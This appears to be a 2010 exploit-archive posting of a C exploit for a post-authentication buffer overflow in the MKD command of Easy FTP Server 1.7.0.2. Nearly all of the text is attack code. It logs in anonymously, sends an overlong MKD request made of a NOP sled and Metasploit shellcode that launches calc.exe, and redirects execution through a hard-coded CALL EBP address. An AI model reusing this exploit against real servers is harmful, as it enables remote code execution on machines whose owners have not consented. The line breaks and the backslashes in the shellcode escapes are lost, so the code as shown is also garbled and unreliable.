Easy Ftp Server v1.7.0.2 MKD Remote Post-Authentication BoF
Posted on 04 April 2010
=================================================================== Easy Ftp Server v1.7.0.2 MKD Remote Post-Authentication BoF Exploit =================================================================== #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/socket.h> #include <netinet/in.h> //************************************************************************* // Easy~Ftp Server v1.7.0.2 MKD Remote Post-Authentication BoF Exploit // ( 11470_x90c.c ) // // Date: 24/03/2010 // Author: x90c < x90c.org > // // Discovered by: loneferret // // Exploits by: // [1] 11470.py (PoC) - loneferret ( Found: 13/02/2010 ) // - http://www.exploit-db.com/exploits/11470 // [2] 11470_x90c.c ( Exploit ) // ( MAGIC RET, Metasploit shellcode ) //************************************************************************* // Metasploit shellcode ( calc.exe ) - 228 Bytes static char shellcode[] = { "xd9xccx31xc9xb1x33xd9x74x24xf4x5bxbax99xe4x93" "x62x31x53x18x03x53x18x83xc3x9dx06x66x9ex75x4f" "x89x5fx85x30x03xbaxb4x62x77xcexe4xb2xf3x82x04" "x38x51x37x9fx4cx7ex38x28xfax58x77xa9xcax64xdb" "x69x4cx19x26xbdxaex20xe9xb0xafx65x14x3axfdx3e" "x52xe8x12x4ax26x30x12x9cx2cx08x6cx99xf3xfcxc6" "xa0x23xacx5dxeaxdbxc7x3axcbxdax04x59x37x94x21" "xaaxc3x27xe3xe2x2cx16xcbxa9x12x96xc6xb0x53x11" "x38xc7xafx61xc5xd0x6bx1bx11x54x6exbbxd2xcex4a" "x3dx37x88x19x31xfcxdex46x56x03x32xfdx62x88xb5" "xd2xe2xcax91xf6xafx89xb8xafx15x7cxc4xb0xf2x21" "x60xbax11x36x12xe1x7fxc9x96x9fx39xc9xa8x9fx69" "xa1x99x14xe6xb6x25xffx42x48x6cxa2xe3xc0x29x36" "xb6x8dxc9xecxf5xabx49x05x86x48x51x6cx83x15xd5" "x9cxf9x06xb0xa2xaex27x91xc0x31xbbx79x29xd7x3b" "x1bx35x1d" }; int main(int argc, char *argv[]) { int sockfd; struct sockaddr_in sa; char rbuf[128]; char x0x[278]; int i = 0, j = 0; int port = 0; int err = 0; printf(" *********************************************** "); printf("* Easy FTP Server 1.7.0.2 MKD Remote BoF * "); printf("* Found by: loneferret * "); printf("* - http://www.exploit-db.com/exploits/11470 * "); printf("* - 11470_x90c.c - x90c * "); printf("*************************************************** "); if( argc < 3 ) { printf("Usage: %s <Target IP> <Port> ", argv[0]); exit(1); } port = atoi(argv[2]); if(port <= 0 || port > 65535) { port = 21; } printf("[PORT] %d/tcp ", port); memset(&sa, 0, sizeof(sa)); sa.sin_family = AF_INET; sa.sin_addr.s_addr = inet_addr(argv[1]); sa.sin_port = htons(port); if((sockfd = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) { err = -1; fprintf(stderr, "[!] Socket failed "); goto out; } // Socket Connect if(connect(sockfd, (struct sockaddr *)&sa, sizeof(struct sockaddr)) == -1) { err = -2; fprintf(stderr, "[!] Connection failed! "); goto out; } printf("[+] Connected! "); // Auth recv(sockfd, rbuf, sizeof(rbuf), 0); send(sockfd, "USER anonymous ", 16, 0); recv(sockfd, rbuf, sizeof(rbuf), 0); if(strstr(rbuf, "okay") != NULL) printf("[USER] anonymous "); send(sockfd, "PASS anonymous ", 16, 0); recv(sockfd, rbuf, sizeof(rbuf), 0); if(strstr(rbuf, "logged in.") != NULL) printf("[PASS] anonymous "); // Fill Payload memset(&x0x, 0x90, sizeof(x0x)); for(i = 20, j = 0; j < strlen(shellcode); j++) x0x[i++] = shellcode[j]; x0x[0] = 'M'; x0x[1] = 'K'; x0x[2] = 'D'; x0x[3] = ' '; // MAGIC RET: // # CALL EBP ( EBP Register points to nopsled of this payload when overflowed ) // # 004041EC FFD5 |CALL EBP // # // x0x[272] = 'xEC'; x0x[273] = 'x41'; x0x[274] = 'x40'; x0x[275] = 'x00'; x0x[276] = ' '; x0x[277] = ' '; x0x[278] = 'x00'; printf("[+] Sending payload... "); // Send payload send(sockfd, x0x, 278, 0); recv(sockfd, rbuf, sizeof(rbuf), 0); if((strstr(rbuf, "denied.") != NULL) || (strstr(rbuf, "too long") != NULL)) { printf("[!] anonymous account doesn't have permission to MKD command... "); printf("[!] Exploit Failed. ;-x "); goto out; } printf("[+] Exploited :-) "); out: close(sockfd); return err; } # Inj3ct0r.com [2010-04-04]
